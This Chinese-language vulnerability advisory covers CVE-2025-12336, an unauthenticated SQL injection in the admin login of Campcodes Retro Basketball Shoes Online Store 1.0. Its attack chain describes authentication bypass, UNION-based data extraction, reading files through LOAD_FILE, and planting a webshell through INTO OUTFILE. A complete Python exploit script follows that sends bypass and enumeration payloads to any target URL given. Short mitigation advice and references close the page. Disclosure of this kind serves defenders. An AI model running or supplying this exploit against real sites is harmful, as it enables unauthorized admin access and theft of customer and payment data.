CVE-2025-12336 Campcodes Retro Basketball Shoes Online Store SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12336

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Retro Basketball Shoes Online Store 1.0

漏洞概述

CVE-2025-12336是Campcodes Retro Basketball Shoes Online Store 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于管理后台登录页面/admin/admin_index.php中，由于对用户输入的Username参数未进行充分的输入验证和过滤，攻击者可以通过构造恶意SQL语句实现SQL注入攻击。成功利用此漏洞可导致未授权访问管理后台、窃取数据库中的敏感信息（包括用户凭证、订单数据、商品信息等），甚至可能通过UNION SELECT等技术在某些配置下执行系统命令。由于该漏洞可远程利用且无需认证，对互联网暴露的管理后台构成了严重安全威胁。漏洞已被公开披露并存在可用的利用代码，建议受影响的用户尽快采取修复措施。

技术细节

该SQL注入漏洞位于/admin/admin_index.php文件的管理员登录功能中。攻击者通过在Username参数中注入恶意SQL代码，可以绕过正常的身份验证流程。由于应用程序直接将该参数拼接到SQL查询语句中而未进行预编译或严格的输入过滤，攻击者可以利用UNION-based、Boolean-based或Time-based等SQL注入技术获取数据库信息。在典型利用场景中，攻击者首先识别出目标网站的管理后台入口，然后通过发送精心构造的HTTP POST请求，在Username字段中注入类似admin' OR '1'='1的认证绕过payload，或使用UNION SELECT语句提取数据库版本、表名、列名等元数据。进一步可利用LOAD_FILE()读取服务器敏感文件，或通过INTO OUTFILE将WebShell写入服务器实现持久化控制。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标网站使用的技术栈，确认目标运行Campcodes Retro Basketball Shoes Online Store 1.0，定位管理后台入口/admin/admin_index.php

STEP 2

步骤2: 漏洞识别

通过手动测试或自动化扫描工具，在Username参数中注入单引号(')触发SQL语法错误，确认存在SQL注入漏洞

STEP 3

步骤3: 认证绕过

利用SQL注入构造认证绕过payload，如admin' OR '1'='1，绕过管理员登录验证获取后台访问权限

STEP 4

步骤4: 数据提取

使用UNION SELECT等技术在SQL注入点提取数据库敏感信息，包括用户表、订单表、商品表等数据结构

STEP 5

步骤5: 权限提升与持久化

通过LOAD_FILE读取服务器敏感配置文件，可能的话利用INTO OUTFILE写入WebShell实现持久化访问

STEP 6

步骤6: 横向移动

获取数据库凭证后尝试连接其他关联系统，或利用获取的管理员权限修改商品价格、窃取用户支付信息等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12336 SQL Injection PoC
# Target: Campcodes Retro Basketball Shoes Online Store 1.0
# File: /admin/admin_index.php
# Parameter: Username (SQL Injection)

def exploit_sql_injection(target_url):
    """
    SQL Injection exploit for CVE-2025-12336
    This PoC demonstrates authentication bypass using SQL injection
    """
    # Target endpoint
    login_url = f"{target_url}/admin/admin_index.php"
    
    # Authentication bypass payloads
    payloads = [
        "admin' OR '1'='1",
        "admin' OR '1'='1' --",
        "admin' OR '1'='1' #",
        "' OR '1'='1' --",
        "' OR '1'='1' #",
        "admin' UNION SELECT 1,2,3,4,5,6,7,8,9,10 --"
    ]
    
    print(f"[*] Target: {login_url}")
    print(f"[*] Testing {len(payloads)} payloads...")
    
    for i, payload in enumerate(payloads, 1):
        try:
            # Prepare POST data
            data = {
                'Username': payload,
                'Password': 'anypassword',
                'btn_login': 'Login'
            }
            
            # Send request
            response = requests.post(login_url, data=data, timeout=10, allow_redirects=False)
            
            print(f"[{i}/{len(payloads)}] Payload: {payload}")
            print(f"    Status Code: {response.status_code}")
            
            # Check for successful login indicators
            if response.status_code == 302 or 'admin' in response.text.lower():
                print(f"[+] Potential successful injection with payload: {payload}")
                return payload
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    return None

def extract_database_info(target_url):
    """
    Extract database information using UNION-based SQL injection
    """
    # Database enumeration payload
    enum_payload = "' UNION SELECT 1,version(),database(),4,5,6,7,8,9,10 --"
    
    login_url = f"{target_url}/admin/admin_index.php"
    data = {
        'Username': enum_payload,
        'Password': 'test',
        'btn_login': 'Login'
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10)
        print(f"[*] Database enumeration response length: {len(response.text)}")
        return response.text
    except Exception as e:
        print(f"[-] Enumeration failed: {e}")
        return None

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sql_injection(target)

影响范围

Campcodes Retro Basketball Shoes Online Store 1.0

防御指南

临时缓解措施

临时缓解措施：1) 在Web应用防火墙中配置SQL注入防护规则，拦截包含单引号、UNION、SELECT等关键词的请求；2) 限制管理后台IP访问，可通过.htaccess或nginx配置只允许可信IP访问/admin路径；3) 暂时关闭管理后台登录功能或启用双因素认证；4) 实施请求频率限制防止自动化扫描和暴力破解；5) 监控数据库日志和Web访问日志，及时发现异常SQL查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12336
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12336
3 Details https://www.cvedetails.com/cve/CVE-2025-12336/
4 VulDB https://vuldb.com/cve/CVE-2025-12336
5 Link https://github.com/HYLCXH/CVE/issues/14
6 Link https://vuldb.com/?ctiid.330123
7 Link https://vuldb.com/?id.330123
8 Link https://vuldb.com/?submit.674490
9 Link https://www.campcodes.com/